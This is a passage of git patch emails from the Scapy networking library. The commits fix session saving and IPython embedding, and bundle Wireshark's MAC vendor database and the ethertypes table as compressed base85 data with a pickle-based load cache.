<10530980+gpotter2@users.noreply.github.com> Date: Mon, 29 Apr 2024 01:49:03 +0200 Subject: [PATCH 1264/1632] Fix regression: scapy sessions --- scapy/main.py | 38 +++++++++++++++++++++----------------- test/regression.uts | 2 +- 2 files changed, 22 insertions(+), 18 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index e58df253fb4..e6e12c50e94 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -399,7 +399,7 @@ def save_session(fname="", session=None, pickleProto=-1): return ignore = session.get("_scpybuiltins", []) - hard_ignore = ["scapy_session", "In", "Out"] + hard_ignore = ["scapy_session", "In", "Out", "open"] to_be_saved = session.copy() for k in list(to_be_saved): @@ -412,11 +412,15 @@ def save_session(fname="", session=None, pickleProto=-1): del to_be_saved[k] elif k in ignore or k in hard_ignore: del to_be_saved[k] - elif isinstance(i, (type, types.ModuleType)): + elif isinstance(i, (type, types.ModuleType, types.FunctionType)): if k[0] != "_": - log_interactive.warning("[%s] (%s) can't be saved.", k, - type(to_be_saved[k])) + log_interactive.warning("[%s] (%s) can't be saved.", k, type(i)) del to_be_saved[k] + else: + try: + pickle.dumps(i) + except Exception: + log_interactive.warning("[%s] (%s) can't be saved.", k, type(i)) try: os.rename(fname, fname + ".bak") @@ -500,6 +504,12 @@ def init_session(session_name, # type: Optional[Union[str, None]] from scapy.config import conf SESSION = {} # type: Optional[Dict[str, Any]] + # Load Scapy + scapy_builtins = _scapy_builtins() + + # Load exts + scapy_builtins.update(_scapy_exts()) + if session_name: try: os.stat(session_name) @@ -534,12 +544,6 @@ def init_session(session_name, # type: Optional[Union[str, None]] else: SESSION = {"conf": conf} - # Load Scapy - scapy_builtins = _scapy_builtins() - - # Load exts - scapy_builtins.update(_scapy_exts()) - SESSION.update(scapy_builtins) SESSION["_scpybuiltins"] = scapy_builtins.keys() builtins.__dict__["scapy_session"] = SESSION @@ -866,7 +870,7 @@ def ptpython_configure(repl): if conf.interactive_shell == "ptipython": from ptpython.ipython import embed else: - from IPython import start_ipython as embed + from IPython import embed try: from traitlets.config.loader import Config except ImportError: @@ -892,19 +896,19 @@ def ptpython_configure(repl): # Set "classic" prompt style when launched from # run_scapy(.bat) files Register and apply scapy # color+prompt style - apply_ipython_style(shell=cfg.TerminalInteractiveShell) - cfg.TerminalInteractiveShell.confirm_exit = False - cfg.TerminalInteractiveShell.separate_in = u'' + apply_ipython_style(shell=cfg.InteractiveShellEmbed) + cfg.InteractiveShellEmbed.confirm_exit = False + cfg.InteractiveShellEmbed.separate_in = u'' if int(IPython.__version__[0]) >= 6: - cfg.TerminalInteractiveShell.term_title_format = ("Scapy %s" % - conf.version) + cfg.InteractiveShellEmbed.term_title_format = ("Scapy %s" % + conf.version) # As of IPython 6-7, the jedi completion module is a dumpster # of fire that should be scrapped never to be seen again. # This is why the following defaults to False. Feel free to hurt # yourself (#GH4056) :P cfg.Completer.use_jedi = conf.ipython_use_jedi else: - cfg.TerminalInteractiveShell.term_title = False + cfg.InteractiveShellEmbed.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile cfg.InteractiveShell.banner1 = banner # configuration can thus be specified here. diff --git a/test/regression.uts b/test/regression.uts index 30c51f84cf5..befa870d14a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -666,7 +666,7 @@ try: except: code_interact_import = "scapy.main.code.interact" else: - code_interact_import = "IPython.start_ipython" + code_interact_import = "IPython.embed" @mock.patch(code_interact_import) def interact_emulator(code_int, extra_args=[]): From 601dbdef9c05f73a82cdcedfb4bb8947127734a6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 11 Apr 2024 18:29:29 +0200 Subject: [PATCH 1265/1632] Bundle standalone 'manufdb' file to comply with Wireshark changes. Loading the dictionnary takes 0.5s by itsef, so we have to cache it in order to keep reasonable boot times. --- scapy/arch/windows/__init__.py | 16 +- scapy/config.py | 5 + scapy/dadict.py | 20 +- scapy/data.py | 135 +- scapy/libs/ethertypes.py | 157 +- scapy/libs/manuf.py | 11418 +++++++++++++++++++++++++++ scapy/main.py | 60 +- scapy/tools/generate_ethertypes.py | 48 +- scapy/tools/generate_manuf.py | 43 + test/regression.uts | 20 +- test/run_tests | 2 +- tox.ini | 7 +- 12 files changed, 11731 insertions(+), 200 deletions(-) create mode 100644 scapy/libs/manuf.py create mode 100644 scapy/tools/generate_manuf.py diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index f432a231eb4..b0a2ffd818d 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -38,7 +38,7 @@ from scapy.pton_ntop import inet_ntop, inet_pton from scapy.utils import atol, itom, mac2str, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope -from scapy.data import ARPHDR_ETHER, load_manuf +from scapy.data import ARPHDR_ETHER from scapy.compat import plain_str from scapy.supersocket import SuperSocket @@ -202,20 +202,6 @@ def _reload(self): ) self.cmd = win_find_exe("cmd", installsubdir="System32", env="SystemRoot") - if self.wireshark: - try: - new_manuf = load_manuf( - os.path.sep.join( - self.wireshark.split(os.path.sep)[:-1] - ) + os.path.sep + "manuf" - ) - except (IOError, OSError): # FileNotFoundError not available on Py2 - using OSError # noqa: E501 - log_loading.warning("Wireshark is installed, but cannot read manuf !") # noqa: E501 - new_manuf = None - if new_manuf: - # Inject new ManufDB - conf.manufdb.__dict__.clear() - conf.manufdb.__dict__.update(new_manuf.__dict__) def _exec_cmd(command): diff --git a/scapy/config.py b/scapy/config.py index c55eb096fbd..1f75e94e207 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -984,6 +984,11 @@ class Conf(ConfClass): #: manipulate it route6 = None # type: 'scapy.route6.Route6' manufdb = None # type: 'scapy.data.ManufDA' + ethertypes = None # type: 'scapy.data.EtherDA' + protocols = None # type: 'scapy.dadict.DADict[int, str]' + services_udp = None # type: 'scapy.dadict.DADict[int, str]' + services_tcp = None # type: 'scapy.dadict.DADict[int, str]' + services_sctp = None # type: 'scapy.dadict.DADict[int, str]' # 'route6' will be filed by route6.py teredoPrefix = "" # type: str teredoServerPort = None # type: int diff --git a/scapy/dadict.py b/scapy/dadict.py index 20bea016638..fa3679e6746 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -10,15 +10,20 @@ from scapy.error import Scapy_Exception from scapy.compat import plain_str +# Typing from typing import ( Any, Dict, Generic, Iterator, List, + Tuple, + Type, TypeVar, Union, ) +from scapy.compat import Self + ############################### # Direct Access dictionary # @@ -66,11 +71,13 @@ class DADict(Generic[_K, _V]): ETHER_TYPES.IPv4 -> 2048 """ + __slots__ = ["_name", "d"] + def __init__(self, _name="DADict", **kargs): # type: (str, **Any) -> None self._name = _name self.d = {} # type: Dict[_K, _V] - self.update(kargs) + self.update(kargs) # type: ignore def ident(self, v): # type: (_V) -> str @@ -82,7 +89,7 @@ def ident(self, v): return "unknown" def update(self, *args, **kwargs): - # type: (*Dict[str, _V], **Dict[str, _V]) -> None + # type: (*Dict[_K, _V], **Dict[_K, _V]) -> None for k, v in dict(*args, **kwargs).items(): self[k] = v # type: ignore @@ -148,3 +155,12 @@ def __getattr__(self, attr): def __dir__(self): # type: () -> List[str] return [self.ident(x) for x in self.itervalues()] + + def __reduce__(self): + # type: () -> Tuple[Type[Self], Tuple[str], Tuple[Dict[_K, _V]]] + return (self.__class__, (self._name,), (self.d,)) + + def __setstate__(self, state): + # type: (Tuple[Dict[_K, _V]]) -> Self + self.d.update(state[0]) + return self diff --git a/scapy/data.py b/scapy/data.py index 7df257bd351..4d951d2c76b 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -9,14 +9,14 @@ import calendar import os +import pickle import warnings - from scapy.dadict import DADict, fixname from scapy.consts import FREEBSD, NETBSD, OPENBSD, WINDOWS from scapy.error import log_loading -from scapy.compat import plain_str +# Typing imports from typing import ( Any, Callable, @@ -28,6 +28,7 @@ Union, cast, ) +from scapy.compat import DecoratorCallable ############ @@ -290,17 +291,69 @@ } +def scapy_data_cache(name): + # type: (str) -> Callable[[DecoratorCallable], DecoratorCallable] + """ + This decorator caches the loading of 'data' dictionaries, in order to reduce + loading times. + """ + from scapy.main import SCAPY_CACHE_FOLDER + if SCAPY_CACHE_FOLDER is None: + # Cannot cache. + return lambda x: x + cachepath = SCAPY_CACHE_FOLDER / name + + def _cached_loader(func, name=name): + # type: (DecoratorCallable, str) -> DecoratorCallable + def load(filename=None): + # type: (Optional[str]) -> Any + cache_id = hash(filename) + if cachepath.exists(): + try: + with cachepath.open("rb") as fd: + data = pickle.load(fd) + if data["id"] == cache_id: + return data["content"] + except Exception: + log_loading.warning( + "Couldn't load cache from %s" % str(cachepath), + exc_info=True, + ) + cachepath.unlink() + # Cache does not exist or is invalid. + content = func(filename) + data = { + "content": content, + "id": cache_id, + } + try: + cachepath.parent.mkdir(parents=True, exist_ok=True) + with cachepath.open("wb") as fd: + pickle.dump(data, fd) + return content + except Exception: + log_loading.warning( + "Couldn't cache %s into %s" % (repr(func), str(cachepath)), + exc_info=True, + ) + return content + return load # type: ignore + return _cached_loader + + def load_protocols(filename, _fallback=None, _integer_base=10, _cls=DADict[int, str]): - # type: (str, Optional[bytes], int, type) -> DADict[int, str] - """"Parse /etc/protocols and return values as a dictionary.""" + # type: (str, Optional[Callable[[], Iterator[str]]], int, type) -> DADict[int, str] + """" + Parse /etc/protocols and return values as a dictionary. + """ dct = _cls(_name=filename) # type: DADict[int, str] def _process_data(fdesc): - # type: (Iterator[bytes]) -> None + # type: (Iterator[str]) -> None for line in fdesc: try: - shrp = line.find(b"#") + shrp = line.find("#") if shrp >= 0: line = line[:shrp] line = line.strip() @@ -320,11 +373,11 @@ def _process_data(fdesc): try: if not filename: raise IOError - with open(filename, "rb") as fdesc: + with open(filename, "r", errors="backslashreplace") as fdesc: _process_data(fdesc) except IOError: if _fallback: - _process_data(iter(_fallback.split(b"\n"))) + _process_data(_fallback()) else: log_loading.info("Can't open %s file", filename) return dct @@ -354,18 +407,23 @@ def __getitem__(self, attr): return super(EtherDA, self).__getitem__(attr) -def load_ethertypes(filename): +@scapy_data_cache("ethertypes") +def load_ethertypes(filename=None): # type: (Optional[str]) -> EtherDA """"Parse /etc/ethertypes and return values as a dictionary. If unavailable, use the copy bundled with Scapy.""" - from scapy.libs.ethertypes import DATA - prot = load_protocols(filename or "Scapy's backup ETHER_TYPES", - _fallback=DATA, + def _fallback() -> Iterator[str]: + # Fallback. Lazy loaded as the file is big. + from scapy.libs.ethertypes import DATA + return iter(DATA.split("\n")) + prot = load_protocols(filename or "scapy/ethertypes", + _fallback=_fallback, _integer_base=16, _cls=EtherDA) return cast(EtherDA, prot) +@scapy_data_cache("services") def load_services(filename): # type: (str) -> Tuple[DADict[int, str], DADict[int, str], DADict[int, str]] # noqa: E501 tdct = DADict(_name="%s-tcp" % filename) # type: DADict[int, str] @@ -472,30 +530,42 @@ def __dir__(self): ] + super(ManufDA, self).__dir__() -def load_manuf(filename): - # type: (str) -> ManufDA +@scapy_data_cache("manufdb") +def load_manuf(filename=None): + # type: (Optional[str]) -> ManufDA """ Loads manuf file from Wireshark. :param filename: the file to load the manuf file from :returns: a ManufDA filled object """ - manufdb = ManufDA(_name=filename) - with open(filename, "rb") as fdesc: + manufdb = ManufDA(_name=filename or "scapy/manufdb") + + def _process_data(fdesc): + # type: (Iterator[str]) -> None for line in fdesc: try: line = line.strip() - if not line or line.startswith(b"#"): + if not line or line.startswith("#"): continue parts = line.split(None, 2) - ouib, shrt = parts[:2] - lng = parts[2].lstrip(b"#").strip() if len(parts) > 2 else b"" + oui, shrt = parts[:2] + lng = parts[2].lstrip("#").strip() if len(parts) > 2 else "" lng = lng or shrt - oui = plain_str(ouib) - manufdb[oui] = plain_str(shrt), plain_str(lng) + manufdb[oui] = shrt, lng except Exception: log_loading.warning("Couldn't parse one line from [%s] [%r]", filename, line, exc_info=True) + + try: + if not filename: + raise IOError + with open(filename, "r", errors="backslashreplace") as fdesc: + _process_data(fdesc) + except IOError: + # Fallback. Lazy loaded as the file is big. + from scapy.libs.manuf import DATA + _process_data(iter(DATA.split("\n"))) return manufdb @@ -524,24 +594,19 @@ def select_path(directories, filename): "etc", "services", )) - # Default values, will be updated by arch.windows - ETHER_TYPES = load_ethertypes(None) - MANUFDB = ManufDA() + ETHER_TYPES = load_ethertypes() + MANUFDB = load_manuf() else: IP_PROTOS = load_protocols("/etc/protocols") - ETHER_TYPES = load_ethertypes("/etc/ethertypes") TCP_SERVICES, UDP_SERVICES, SCTP_SERVICES = load_services("/etc/services") - MANUFDB = ManufDA() - manuf_path = select_path( - ['/usr', '/usr/local', '/opt', '/opt/wireshark', - '/Applications/Wireshark.app/Contents/Resources'], - "share/wireshark/manuf" + ETHER_TYPES = load_ethertypes("/etc/ethertypes") + MANUFDB = load_manuf( + select_path( + ['/usr', '/usr/local', '/opt', '/opt/wireshark', + '/Applications/Wireshark.app/Contents/Resources'], + "share/wireshark/manuf" + ) ) - if manuf_path: - try: - MANUFDB = load_manuf(manuf_path) - except (IOError, OSError): - log_loading.warning("Cannot read wireshark manuf database") ##################### diff --git a/scapy/libs/ethertypes.py b/scapy/libs/ethertypes.py index 67b208c7b3f..c93aaeac0bf 100644 --- a/scapy/libs/ethertypes.py +++ b/scapy/libs/ethertypes.py @@ -35,107 +35,60 @@ */ """ -# This file contains data automatically generated using +# Hi There! +# +# You may be wondering what this giant blob of binary data here is, you might +# even be worried that we're up to something nefarious (good for you for being +# paranoid!). This is a base85 encoding of a zip file, this zip file contains +# a version of '/etc/ethertypes', generated from OpenBSD's own copy, so that +# we are able to use it when not available on your OS. + +# This file is automatically generated using # scapy/tools/generate_ethertypes.py -# based on OpenBSD public source. -DATA = b""" -# -# Ethernet frame types -# This file describes some of the various Ethernet -# protocol types that are used on Ethernet networks. -# -# This list could be found on: -# http://www.iana.org/assignments/ethernet-numbers -# http://www.iana.org/assignments/ieee-802-numbers -# -# ... #Comment -# -8023 0004 # IEEE 802.3 packet -PUP 0200 # Xerox PUP protocol - see 0A00 -PUPAT 0200 # PUP Address Translation - see 0A01 -NS 0600 # XNS -NSAT 0601 # XNS Address Translation (3Mb only) -DLOG1 0660 # DLOG (?) -DLOG2 0661 # DLOG (?) -IPv4 0800 # IP protocol -X75 0801 # X.75 Internet -NBS 0802 # NBS Internet -ECMA 0803 # ECMA Internet -CHAOS 0804 # CHAOSnet -X25 0805 # X.25 Level 3 -ARP 0806 # Address resolution protocol -FRARP 0808 # Frame Relay ARP (RFC1701) -VINES 0BAD # Banyan VINES -TRAIL 1000 # Trailer packet -DCA 1234 # DCA - Multicast -VALID 1600 # VALID system protocol -RCL 1995 # Datapoint Corporation (RCL lan protocol) -NHRP 2001 # NBMA Next Hop Resolution Protocol (RFC2332) -NBPCC 3C04 # 3Com NBP Connect complete not registered -NBPDG 3C07 # 3Com NBP Datagram (like XNS IDP) not registered -PCS 4242 # PCS Basic Block Protocol -IMLBL 4C42 # Information Modes Little Big LAN -MOPDL 6001 # DEC MOP dump/load -MOPRC 6002 # DEC MOP remote console -LAT 6004 # DEC LAT -SCA 6007 # DEC LAVC, SCA -AMBER 6008 # DEC AMBER -RAWFR 6559 # Raw Frame Relay (RFC1701) -UBDL 7000 # Ungermann-Bass download -UBNIU 7001 # Ungermann-Bass NIUs -UBNMC 7003 # Ungermann-Bass ??? (NMC to/from UB Bridge) -UBBST 7005 # Ungermann-Bass Bridge Spanning Tree -OS9 7007 # OS/9 Microware -RACAL 7030 # Racal-Interlan -HP 8005 # HP Probe -TIGAN 802F # Tigan, Inc. -DECAM 8048 # DEC Availability Manager for Distributed Systems DECamds (but someone at DEC says not) -VEXP 805B # Stanford V Kernel exp. -VPROD 805C # Stanford V Kernel prod. -ES 805D # Evans & Sutherland -VEECO 8067 # Veeco Integrated Auto. -ATT 8069 # AT&T -MATRA 807A # Matra -DDE 807B # Dansk Data Elektronik -MERIT 807C # Merit Internodal (or Univ of Michigan?) -ATALK 809B # AppleTalk -PACER 80C6 # Pacer Software -SNA 80D5 # IBM SNA Services over Ethernet -RETIX 80F2 # Retix -AARP 80F3 # AppleTalk AARP -VLAN 8100 # IEEE 802.1Q VLAN tagging (XXX conflicts) -BOFL 8102 # Wellfleet; BOFL (Breath OF Life) pkts [every 5-10 secs.] -HAYES 8130 # Hayes Microcomputers (XXX which?) -VGLAB 8131 # VG Laboratory Systems -IPX 8137 # Novell (old) NetWare IPX (ECONFIG E option) -MUMPS 813F # M/MUMPS data sharing -FLIP 8146 # Vrije Universiteit (NL) FLIP (Fast Local Internet Protocol) -NCD 8149 # Network Computing Devices -ALPHA 814A # Alpha Micro -SNMP 814C # SNMP over Ethernet (see RFC1089) -XTP 817D # Protocol Engines XTP -SGITW 817E # SGI/Time Warner prop. -STP 8181 # Scheduled Transfer STP, HIPPI-ST -IPv6 86DD # IP protocol version 6 -RDP 8739 # Control Technology Inc. RDP Without IP -MICP 873A # Control Technology Inc. Mcast Industrial Ctrl Proto. -IPAS 876C # IP Autonomous Systems (RFC1701) -SLOW 8809 # 803.3ad slow protocols (LACP/Marker) -PPP 880B # PPP (obsolete by PPPOE) -MPLS 8847 # MPLS Unicast -AXIS 8856 # Axis Communications AB proprietary bootstrap/config -PPPOE 8864 # PPP Over Ethernet Session Stage -EAPOL 888E # 802.1X EAP over LAN -AOE 88A2 # ATA over Ethernet -QINQ 88A8 # 802.1ad VLAN stacking -LLDP 88CC # Link Layer Discovery Protocol -PBB 88E7 # 802.1Q Provider Backbone Bridging -NSH 894F # Network Service Header (RFC8300) -XNSSM 9001 # 3Com (Formerly Bridge Communications), XNS Systems Management -TCPSM 9002 # 3Com (Formerly Bridge Communications), TCP/IP Systems Management -DEBNI AAAA # DECNET? Used by VAX 6220 DEBNI -SONIX FAF5 # Sonix Arpeggio -VITAL FF00 # BBN VITAL-LanBridge cache wakeups -MAX FFFF # Maximum valid ethernet type, reserved -""" +import gzip +from base64 import b85decode + +def _d(x: str) -> str: + return gzip.decompress( + b85decode(x.replace("\n", "")) + ).decode() + + +DATA = _d(""" +ABzY8N|hyM0{^91ZExbZ7XI#Eaioz}AWb2>6zJa3jGPeKXcNeglyY@-KbXWoE+IxqXv@Ffm=n6^CHTV6)&I=xJ;}8aq!6UL>!9?$pv +`GMJXbYp80SsD}m)4js=fFWN&Z9pC^&;iWd2T;Oc#8Qj`#hV;aMX!&)3O3HkNH4X`cC!>{f3)6-KcVH +s4Z)J<;u$39a{5P2SVhR?&?j@145>yMs!3G@=R9R6kif=#Vs(Z_r%4vh)K<>Hq+ +<<{$+8p6phA&wP968%zdMFDXfV{VP|&lZX{1Sy0z`Z)r!Lrsw6wsVMpW? +HK2ltJ-jLqx0sNmFysrtOQHs2a&&|tz=2rn|GRIdZ)S?i&94$))<;o{#?SHIG~#@{`Oxho^)8Z*Xts+ +>08!2bkEWTZVwAL^809Umhnh-p#34`C5KFu7+M?bN<8PW&e(6(>3vI +0^nSOmOLV#1WJMBznTlw4ISAr-uKC_)eM`&ZWNVS{&wla*c6)G>vc$%3CL3_+lz20L{GM;1_te<703i +?`_lI^WSS$(VmP*k51VPUC0-X?v44uu1t2PkH(*J-3Atb2f5W%>Y0p*g=mT&CA#?gLQG +nOiHyYraJt+m~t@zxV%GtwEUqJ4&4M%5Y*%gLH0kL?>Di_?FQ|Df#>3p6Bv4y1YER~}7d5RxDen3MKl +%l=PF){8TwVCUY`Z+8}O1S7f+~F(R&tk6?D(gdM{$> +Rn<4K#*sUiR>aI8mom)CpaNUWnS0o#jeZ};RS_A`+dJ44vVVpi_s9>i;mNIOV_R?23er;;32udbPPYetAO)8EQ`17Gf7XE +xTR#~jS#DYC0ZV@}Ed*NEwwe3d~neYn)M>#>D8)Mv#ZOs&hfi8v?oJXQkPgv{a;n8C$T7-sS&5nVt64 +3CMka!ezgMt}S4aQ?-&d7Ld*IqOCeMV{6fJ^!pV>J`AX&IdMSxL9KXbeelAWJWK~Z;XWKC==mrL15*J%=!MU$A +biCg29HoDTYBRLpzO|C_&2yd7U9S8d +x8u6XzCe5C^HBn#8;J{Mv?fHQZ~T0kKTOV#{)L7MZw?8Zw=}F6I|`@;_cB9iCQFa!km^)NMjV)0p5O0 +It9Wbs6j~N)eT^HLjgRUss%_=PMf&%F;P9u*ST~6hdA9j;chuibd1ImYp4qN$S!Ng6a)JBa`D>F0hdWe=uaEi`5|7^7xoyzQiLf)I5b|i7iBxP(mEZtL^N^HVfqK +C4iRV~;jg|flR!@$t_-A~S5(GomD)aR0p%!kR2I@NomVW!P0cT<_uPI-J%$u+d+}VRdhdoI{H!^yy9* +dz!#na_nk$k`1Y>R9-RYf3VA$lCJ?Ts%S*%w&BF4{>)YAMz+=w +*xr_asB;yN6Dpn6q|b=dIZJd|iQBr*L^VHN1f55%`jsx>}L6 +}0SC;Q_b9$A{i@cIQy_4UqIdGU$?!ejC~XT@GkQ5paM +""") diff --git a/scapy/libs/manuf.py b/scapy/libs/manuf.py new file mode 100644 index 00000000000..b3a4b1bed82 --- /dev/null +++ b/scapy/libs/manuf.py @@ -0,0 +1,11418 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +# manuf - Ethernet vendor codes, and well-known MAC addresses +# +# Laurent Deniel +# +# Wireshark - Network traffic analyzer +# By Gerald Combs +# Copyright 1998 Gerald Combs +# +# The data below has been assembled from the following sources: +# +# The IEEE public OUI listings available from: +# +# +# +# +# +# +# Michael Patton's "Ethernet Codes Master Page" available from: +# +# Many people contributed to Michael's list. See the "Acknowledgements" +# section on that page for a complete list. +# +# This is Wireshark 'manuf' file, which started out as a subset of Michael +# Patton's list and grew from there. The Wireshark list and Michael's list +# were merged in 2016. +# +# In the event of data set collisions the Wireshark entries have been given +# precedence, followed by Michael Patton's, followed by the IEEE. +# +# This file was generated. Its canonical location is +# https://www.wireshark.org/download/automated/data/manuf +""" + +# To quote Python's get-pip: + +# Hi There! +# +# You may be wondering what this giant blob of binary data here is, you might +# even be worried that we're up to something nefarious (good for you for being +# paranoid!). This is a base85 encoding of a zip file, this zip file contains +# a copy of Wireshark's 'manuf' file, so that we are able to use it when not +# available on your OS. + +# This file is automatically generated using +# scapy/tools/generate_manuf.py + +import gzip +from base64 import b85decode + + +def _d(x: str) -> str: + return gzip.decompress( + b85decode(x.replace("\n", "")) + ).decode() + + +DATA = _d(""" +ABzY8x|Sto0{^7F+hXH5lJ|LC`xLmUuX?uZE*~Uk?$uHfWvgu2E>n4`tA!<4LYpGhJUFdOWY!Lt +gj36m@dcNuDnfkc^@q|MFh=0T%fBZjx!2b&TpI`nUfBEI^=}9lOOw+yis*3#eckx(P!u)IekI<#q=7k +c=e7nuF|I61tX@1Yv<1o&PU0%paHx*9bTjA`z70%yVVesAx!}nIWcyEOd@2&9hy%nOS!rivWvxTgbF0 +}*UNyMpIR^|_SS(+a?#>%6n@?2Jhe&x_}xp7lttjlH2A=#Ie+LphIS+>L)lcvU0Kl*!Ma8s?q9mS+{{ +V!dWHHRC$)s|NjwpO6ld>?`%mftDm);WjU}s!%CBR{;N%s>BMUE6lPdQ_8-v1qHEC +%T1Q2`Fh`agcH&)#&WA(8DODv`keMdzB0gaqzg=BC3m^bDh}OmdP2Ivq`uFy>R!K^$21^-ghT&r!)qd +a;jWO&R58F(qyv0WkLDMOalYNv2*Q&4ht7SGz7XwpsaC7WK9gGnVF?=0EHl55*}5{t+N5JdbJ7T-)r- +uQrutkji(E|9i(WS0azsD=i%L@lyh)M1Ff#uVKe2`8gX`wUC-hT4ruN%$pdBb&hxCbsN=scLQeA_XC{nE$cSNQ+iIy<%>JY14=q +0hRkrGJ?oXz!snO1e(;_!wRTK=V>U%O&?py3;t%GV{`+l7NWtlbwvseb9 +J#aot(oi#m7D){UTn=Y%Z4@ovFftK-#yO))}8;pgBCKGOrPYrNWGrJ&o&(^pj)M*nkjZQH-o2ng${(Hvek0VNY5FUrTIu@0Qh9s)wLKS~ZgHx$uExp#v)fu0(q +uV^#qm@zxG0}wo~BQ_+Tv2IfC&`LnSc1Ej^p7JTv<-TNqrDzY)ra3Gt23TxLttWGX{ss`(&7S|!nzxt +kg#_TGNr#v%6^HJdJEz@1Rc0QV%S^772jOU|jM+juU$_|Q8Fu>j6N>{f&0u*tQAqQ1sWWpL=($7E6{e +;=M#ge4&AYT9kd&VZ`8;?|`odkRUsP3TV|G>n1kgrA#t?1h_;b=BZp{lew!|zmb031RRKrW*1N=GZ6N +%E#dAuv(TR9MpdY+IOX68on${BSYf>Gy2Fswxlvej~&uatS$=>k9?(V3pz>4-Lr6fBVd!qQ#%W~8s&# +x3Z17}8HBOU&F?PrZ3D-K_#M&(3w-FMxg!QxkaV8Jd{w1asxbG{fWJG96W3tCetN6R(o6whLJ$y +` +|y4RzeNaOdJSLSdw&@**Lnrokh3NMC}}ymSxZ^!gjK#V1U9}bi%34Jf3fJXem`8R_eRlTYC(lWu0Ly(t}2InqFmY*>6EyWrFSk_$djilAbgIE6&gT4$u-14|#58 +G3dQmk94eW`E$OO-{nNFbpQcWnJ@On>Uucnn0uEBj6^i|EZN`aR3#m4Ayd;UOAdXj$|3D=`BU{@589g +g7Q}xEKwg1%wY*f@yw1!#lQj@*C9Lt0E$d8&T)7YEq4fdDLSY!S#x%Q6k(IxY7nqf1E@l0BIHJarHEk +}P(d$55daD=9(@s)3wQ?dY0v9GjHXI2 +Vu!SK32J4GpZ_f8(At2Jx@X!yIG7>a?7FhH9ofcZnfbsg9dM}(Nv1)woWFoXNp)S*V0&hl!%Q!wcUI09FK7>GR=lif3@PS%kwfPL0su*B7YJ15H*RTkrS$r +7MCD>YSR8jrl(ES1*NVm8$bCYQ|4A^-0f%Jw^kuT*+xq;k6`wN7X-pv?)fldW-5BrY{dPb}d5#RRQ&pvQdtErLcZQ!W1??yEhqa6YivWWU3`$pG}(*hX0TnAhgZn +~OCNF3slP4^wLH?yHURkA>jNef*=fu6EX716YnuBU#ZL?;vy=&c{W>}=s#D>iK5(Nj9o9X^u2Gcn^-JRdh83}HF +C#Z}~G2}isfdfqSTDf8-;0c#5%N&k3QhL#G@wA*GZ{5a}86`QeBF}A*-`@$c`)c8xcbDhFY;@E;PbOh +LJG+?y}U2HGw(iPASd~uzv``$y$K2EARB*#&B5mP$LDP!V)Q);j(9=_oquEC=j%U04pd&AawtCf24M$jtFs7}fxq&(yMGq5+-Js!IFWKS1(ug +GGn`(Q7kl)xN!Z^VOO%bq%gcY{?YbZV}jRpB-lJ+Q4t`W9n4xt66gKWf+W2+i1M+A~&~GLz&{6@`S=egL- +iCs!NMO|)$FAXnbXH*jPK8-MHYcSL8W)R^jSSJ;C)FUF#$eDmbRE(93#ErLgM?@Vva=UH;-v5-fkZ^b +LUm9Ktsa=>>?kLjo}YIy@Znq_IVPjUhRR^RrMo7+8Rw>oT1>2uf;dQc9IED2l)U>!P9&Cr% +mCy76swS~^ziL2iDwM>TZ-%uZ{zTYDa6tvv+xPKX&h{)4(}fP+S6w~`RZ +#!~wej!%Ae+hN@AFLTc-?{_$##vh#lP(j71(b)@i@u;cI{KAE&og|WLsONP&AP$B!OuxLNxZGou*vPA=Q`1QpLx +{UIZHNj`5dPXjx4ngA+YM0nzdOO)@UBuU4A@aYbUK%FxZybgK*>ybICes9P{Ps%6H)g=qx;*(&n{SrC +-4~5V)SYoE0oI&I&C{bwWDLe +O)LV_$;_Z7kz+1YqD5px%m_`3cX%hlOerKw%pw4Oa%~@uJUx%7$6fm$H1XMURRrOo;F~-8Gp<<*!<<3cueOfOg54p34+^#et7_@hM +%1s3Q2}0q|uRyTlpav|Za*G1mmVyI|OuX$F}1oK`-yW27<_0o;hGT-&eU^2EN4=^lb!Z<{kn2c(0=bR +&9ax~shpGcj8bp3EzDdt=@(#>({Q#Vk+ZJj?FI0|=nLMNCYmoaM5DzTh@REF3zikExqkXoS-#>B{Pkk)r(D+M##kZaoPc+xFwcG5HiM}Tfc=O&(@j)aGQhGE?%I$tz(R3nc{edL&-#~USz#zc +|A%lNq_k3FYn^sqEr$@Ix +i3J89RV9WjK`A<#YtcgtN8b-@)o~;sTiXjL~?F$V%p2PNA2hU+kWzQmfdO?p?&17<|)GjuC*@6HPu|3 +E!wkGs7G7d~X&|9^3a{TXF?+}C~>zdT_5kArpG3*~V(6eJbjam)6lxw@I8=zwtk}b9=JKX`7jNddit)a+jwXrnm3YnD%|H~2mq)_6fOz4-HrE;s<_b(gs1G8-{YA1-k7$wkSXk&IuMR%g$dscTJ1A6iEfer0w`itVrB`#J-B +T}14lq@W97KjZj}S!X{9BrbV +mIi_h!s0IkX4N6DEndhB;?pErHB|@MH$C^}gGZs7@w+g^gVEvN`lzk#9kl;Mr`=C>MNFn3%&K48@mb1ME} +RzI%QdU)dvj9JYWV;srUbfgAsxAMEsomWrKI?ccZJ2myz7=R7*nJFhsJ9A&Cr8W)EelvtO?wFo^j>F* +zK +xq&Zf@ObH3E#&{~N8`qA-$3KGf5NmhclYrvejy8uyoDa2pD;B|oc +$}`e^HMN_zNdJZ8Dv4pyi?-$4Z%K0wU39j#Ua=Kh6Kc+H}J?zKL(+1&7WXqAmr6e97^Az`+|0XhK~ix +B1F@!+U6-@|`d_&Heb^wC2oyb^`*5-WV0seAn4V$rU_rfR=md7+r@?n7jstWVKcH6CyMp^ve8>?O1pS +e8MC)qr6;h61A)gvsShsJnehT$P=crnHb|wRX;}aSp(uo7{ywwUzS4 +mJ7h4EteCfv$+RlD%u +GasGUG}cuttuCfTUem^;q&@$lBbM`bsoOmb*lhI&Wq?;Ki1={b%rmx({MU_kGJu5-XG14P=(+=K8Gjj 